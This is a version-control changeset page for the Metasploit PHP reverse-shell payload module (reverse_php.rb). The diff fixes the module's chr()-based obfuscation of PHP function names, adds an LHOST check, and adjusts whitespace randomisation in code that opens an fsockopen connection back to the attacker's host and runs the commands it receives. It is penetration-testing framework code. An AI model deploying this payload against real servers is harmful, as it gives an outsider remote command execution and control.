Changeset 5430
- Timestamp:
- 03/04/08 14:50:39 (5 months ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/payloads/singles/php/reverse_php.rb
r5429 r5430 69 69 def php_reverse_shell 70 70 71 if (!datastore['LHOST'] or datastore['LHOST'].empty?) 72 # LHOST should always be set when we get here... but in case it isn't, 73 raise Rex::ArgumentError, "LHOST is required" 74 end 71 75 ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first 72 76 port = datastore['LPORT'] … … 80 84 $port=#{port}; 81 85 $_=chr(95);$a=chr(97);$b=chr(98);$c=chr(99);$d=chr(100);$e=chr(101); 82 $f=chr(102);$h=chr(104);$i=chr(105);$ l=chr(108);$m=chr(109);$n=chr(110);83 $ o=chr(111);$p=chr(112);$r=chr(114);$s=chr(115);$t=chr(116);$u=chr(117);84 $ x=chr(120);$y=chr(121);86 $f=chr(102);$h=chr(104);$i=chr(105);$k=chr(107);$l=chr(108);$m=chr(109); 87 $n=chr(110);$o=chr(111);$p=chr(112);$r=chr(114);$s=chr(115);$t=chr(116); 88 $u=chr(117);$x=chr(120);$y=chr(121); 85 89 $disabled=@ini_get($d.$i.$s.$a.$b.$l.$e.$_.$f.$u.$n.$c.$t.$i.$o.$n.$s); 86 90 if(!empty($disabled)){ … … 139 143 $command=NULL; 140 144 $nofuncs=$n.$o.chr(32).$e.$x.$e.$c.chr(32).$f.$u.$n.$c.$t.$i.$o.$n.$s.chr(32).chr(61).chr(40); 141 if(is_callable( @f.@s.@o.@c.@k.@o.@p.@e.@n)and!in_array(@f.@s.@o.@c.@k.@o.@p.@e.@n,$disabled)){145 if(is_callable($f.$s.$o.$c.$k.$o.$p.$e.$n)and!in_array($f.$s.$o.$c.$k.$o.$p.$e.$n,$disabled)){ 142 146 $sock=fsockopen($ipaddr,$port); 143 147 while($cmd=fread($sock,2048)){ … … 165 169 END_OF_PHP_CODE 166 170 167 shell.gsub!(/[\t\n]+/, "\t") 168 # spaces are important but there's no need for tabs and newlines, so 169 # randomize them bit 170 shell.gsub!("\t") { |s| 171 # randomize the spaces a bit 172 shell.gsub!(/\s+/) { |s| 171 173 len = rand(5)+2 172 set = "\x09\x20\x0 d\x0a"174 set = "\x09\x20\x0a" 173 175 buf = '' 174 176
